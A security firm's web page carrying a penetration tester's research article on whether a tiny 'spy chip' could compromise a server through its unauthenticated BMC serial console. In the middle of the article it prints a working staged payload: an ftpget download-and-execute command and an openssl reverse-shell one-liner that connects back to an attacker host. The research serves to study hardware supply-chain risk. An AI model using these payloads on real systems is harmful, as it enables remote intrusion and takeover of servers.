Bulletproof’s range of cyber security, data protection and compliance services are your best defence against threats to your business. With nearly a decade of providing trusted security services, we’re continuing our mission of solving the greatest cyber security & compliance challenges through innovation and simplicity. Explore our range of services and find out how Bulletproof can help your business.
Helping people solve their security challenges is what we do, so we’re always keen to hear from you.
Discover CREST penetration testing & continuous security
Internal & external infrastructure, network & system testing
Manage multiple tests & get external security assurance
Thoroughly assess your web apps & APIs for security flaws
Test your response to a simulated real-world cyber attack
All cloud platforms & services tested, including Azure & AWS
Test your human cyber defences with social engineering
Android, iOS & custom mobile application security testing
Find out more about penetration testing – what it is, when you need it, and why it’s a core component of any business. Discover how pen test helps with compliance, powers best practices, and helps your organisation win new business.
Gap analysis, implementation, audits & more from GDPR experts
On-going support to easily manage your data protection obligations
Consultant-led support to meet all levels of DSPT submission
Flexible & engaging data protection training from certified experts
Get peace of mind that your data protection is being managed by trusted, certified consultants. All Bulletproof data protection services are delivered by our highly trained, experienced and qualified staff.
Gap analysis, implementation, audits & more from dedicated ISO consultants
Find the next step in your strategy with this consultant-led assessment
Get quick & easy CE certification with a range of feature-packed packages
Flexible access to top-tier information security strategy & management
Experienced SOC 2 consultants, AICA audits & compliance automation platform
On-site, remote and video-based security training to boost your resilience
Affordable expertise & support to help you meet & maintain PCI DSS compliance
Go beyond compliance with information security services that are designed to give real operational benefits to your business. All delivered by seasoned, certified Bulletproof security consultants.
24/7 defence against cyber attacks with proactive threat detection
Get help responding & recovering from cyber incidents
Detect, analyse and stop cyber attacks with real-time prevention
Forensic support & data recovery following cyber attacks
Stay on top of new vulnerabilities with powerful, flexible scanning
Evaluate your wireless network for security weaknesses
Discover how your business can identify & manage cyber threats
Comply with regulations, meet certification standards & best practices
Train and test your staff for security resilience, data protection & compliance
No matter what your cyber or compliance challenges, Bulletproof is here to help. We like to work with you as a trusted partner to solve problems, not sell services. No pressure tactics and no false promises.
Learn about our mission to make cyber & compliance accessible to all
Grow your business with high-margin, high-value & partner-ready services
Become part of the Bulletproof team & supercharge your career
Bulletproof’s in-house SOC powers our Managed SIEM & MDR services
We love to talk. Tell us about your cyber & compliance challenges
At Bulletproof we love to solve problems with simplicity & innovation. It’s our mission to make compliance & cyber security services accessible to all. We take pride in building and nurturing teams of exceptional talent, so we’re confident that our cyber security & compliance services are the best way to stay one step ahead of the hackers and protect your business.
Helping people solve their security challenges is what we do, so we’re always keen to hear from you, no matter what you have to say.
Get the latest news, views & expert insight in the world of cyber security, data protection & compliance
A helpful index of cyber security terms, compliance acronyms and industry terminology to make life easy
Discover what we have to say about the threat landscape & what businesses need to know to get ahead
Find out how we can make companies like yours Bulletproof. Don’t take our word for it, hear direct from our clients
Detailed insights & helpful tips for understanding penetration testing, data protection & more
Interesting data & top tips at a glance, with insightful infographics covering all areas of cyber security & compliance
Watch our experts talk through their thoughts & opinions on a variety of security & compliance topics
See when & where we’re going to be bringing Bulletproof insight to an event near you
Ayisha Bari
Find out what ransomware is, how attacks work & types of attack to help you get started with keeping ransomware out of your business.
Read More
This is a Bulletproof Tech Talk article: original research from our penetration testing team covering issues, news, and tech that interests them. It’s more technical and in-depth that our usual blog content, but no less interesting.
Some readers may remember an article published by Bloomberg entitled "The Big Hack: How China used a Tiny Chip to Infiltrate U.S. Companies". The article alleges third-party Chinese circuit board manufacturers were secretly embedding tiny "spy chips" into server mainboards in order to get their hands on sensitive information – and had been doing so for years. The alleged devices were smaller than a grain of rice and would go un-noticed among the densely packed components that go into making a server mainboard.
This was met with some scepticism among certain circles of the tech community and the received wisdom of the time was that the spy chips reportedly only had six connections to the outside world and were of such a size that it would be practically impossible to embed sufficient memory and processing power into the device to make it do what it was alleged to do. They cast doubt on the spy chips’ ability to intercept and modify data flowing throughout the system via "buses" which, incidentally, consist of many more connections than the tiny six-pin chip would be able to use. Both Bloomberg and the hardware manufacturers in question went very silent, or strenuously denied, the story soon after.
However. As a penetration tester, I’m always one to challenge the received wisdom, this got me thinking of ways that such a feat could be accomplished with such a small and simple device. Maybe these spy chips weren’t so far-fetched afterall. So I grabbed an old server and got thinking....
As mentioned in the original article, most servers possess a BMC, or Baseboard Management Controller, that’s used for monitoring hardware parameters such as temperature, cooling fan status and otherwise remotely managing the server. This device, often a SoC, or System-on-Chip, runs entirely independently from the main CPUs in the server. The BMS has its own operating system, memory, storage, and network separate from the main server. It’s also powered by its own always-on power supply, and hence is always available whether the server is powered up or not.
In a minimal configuration, the BMC may be accessed over the network using protocols such as IPMI, however, more advanced management controllers also have web interfaces which have more advanced features such as mounting virtual media. One interface that is usually not exposed to the user is the BMC serial port which is used at the factory for pre-configuring and diagnosing it before being shipped to customers.
Due to this interface not being easily accessible, it is often unsecured. This is called ‘security by obscurity’, and is almost always a bad idea. When connected to this serial interface, it could provide a privileged shell with no authentication required. For the purposes of this research, I got my hands on a retired Dell PowerEdge R210 server. The below image is of the unpopulated PCB pads connecting to the BMCs serial port on this particular machine.
Because of these security oversights, I reasoned that this may be a possible vector of attack, considering the following facts:
The last of the three facts above led me to find some possible devices that would be fit for our purpose. As it was only a serial interface, they wouldn't need to be particularly fast, or have a large number of pins (hence, only needing a small footprint device) and with a small payload, wouldn't need a huge amount of memory to store it. With this in mind, after some research, the following devices were considered:
These chips are tiny – a maximum of 2mm x 2mm, and have between 6 and 16 pins. Pencil tip for scale.
As you might imagine from such small devices, each one had certain limitations. And after putting the devices through their paces and comparing them to my list of requirements, I chose the tiny ATTiny10. Despite its size, this little chip has some reasonably good specifications:
The next step was to determine what facilities were available to me in the BMC’s operating system, and from that, craft a small payload that could be deployed from our spy chip. To get going, I wired up the BMC directly to my system using a USB to serial adaptor so I could interact with it.
During boot-up, which took around two minutes, the BMC was found to be using a bit rate of 115200 baud
After booting was completed, it was simply a matter of pressing 'Enter' to get a privileged 'root' prompt – no authentication required! Told you ‘security by obscurity’ is a bad idea.
I spent a day or so exploring what commands were available in this somewhat limited system, and which payloads could be used with them. I decided that a staged payload would be best as the memory available on my spy chip was limited, so all the first stage would need to do is pull the larger second stage from an FTP server and execute it. This also allowed for some flexibility as the second stage could be changed as needed, and could be much larger if required (there was 45 MB of volatile storage available, so plenty of room)
Commands such as curl and scp weren't available on the BMC I stuck with trusty FTP, and an appropriate server set up. The first stage payload was written, using commands already available on the BMC, the result being:
curl
scp
ftpget -u ftp -p pass 192.168.1.67 /tmp/payload payload && chmod 755 /tmp/payload && /tmp/payload
This would grab a file called 'payload' off an anonymous FTP server of our choice, set it as executable, and run it.
payload
The second stage payload was a little more difficult to create, as a number of tools, such as netcat, nc and bash sockets weren't available, and a reverse SSH connection wouldn't work without a needing a bunch of configuration files. However, openssl was available, and could be used to open sockets and redirect input and output:
netcat
nc
bash
openssl
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.67:4242 > /tmp/s; rm -f /tmp/s
This would open an SSL connection back to a waiting netcat server listening on port 4242 on the attacker machine.
Both payloads in combination were tested and were found to work, with a reverse shell being opened back to the attacker machine.
Now onto the hardware...
Fully implementing this on one of my tiny microcontrollers, while certainly feasible, would require a lot of manual assembly language coding in order to pack all the necessary code into the small device. So in order to get a proof of concept quicker, I grabbed a Raspberry Pi Pico running Arduino, to test whether this would work in practice with the following code:
The code would start by turning on the built in LED, it would then wait two minutes for the BMC to boot, turn off the LED to indicate that the payload was about to be sent, send two newlines, wait five seconds, then finally send the payload.
With the server completely unplugged, the Pi Pico was wired up ready for the first test, with the power line being tapped from a nearby 3.3v supply.
Finally, we're ready to test. A netcat listener was set up, fingers were crossed, and the server power was turned on. About two minutes later, I was greeted with this:
A root shell!
To sum up, it would appear that the type of attack outlined in the Bloomberg article is absolutely feasible, with some ifs and buts. Primarily it’s contingent on the BMC's network interface having some form of Internet access. Though BMCs usually live on management networks and don’t necessarily initiate outbound connections to the Internet, there are situations where it is put on a public network to download or update the main server operating system, giving the hacked BMC a chance to phone home. And that’s without diving into the murky world that is exfiltrating data from air-gapped machines.
From my perspective, the Bloomberg article does seem to inflate the technical capabilities of the "Chinese spy chips" somewhat, however, I’m dealing with off-the-shelf components and limited research time. For nation-state powered attacks with more resources, then in retrospect, the article’s claims don’t seem to be so far fetched at all.
Chay’s experience as network manager, developer and sysadmin all comes together to make him an expert penetration tester. Always keen to challenge expectations and push boundaries, he’s a bastion of knowledge within his team.
Find your vulnerabilities & meet compliance requirements with penetration testing from Bulletproof. You might even get Chay working on your project.
If you are interested in our services, get a free, no obligation quote today by filling out the form below.
I'd like to receive Bulletproof communications about relevant services and events
For more information about how we collect, process and retain your personal data, please see our privacy policy.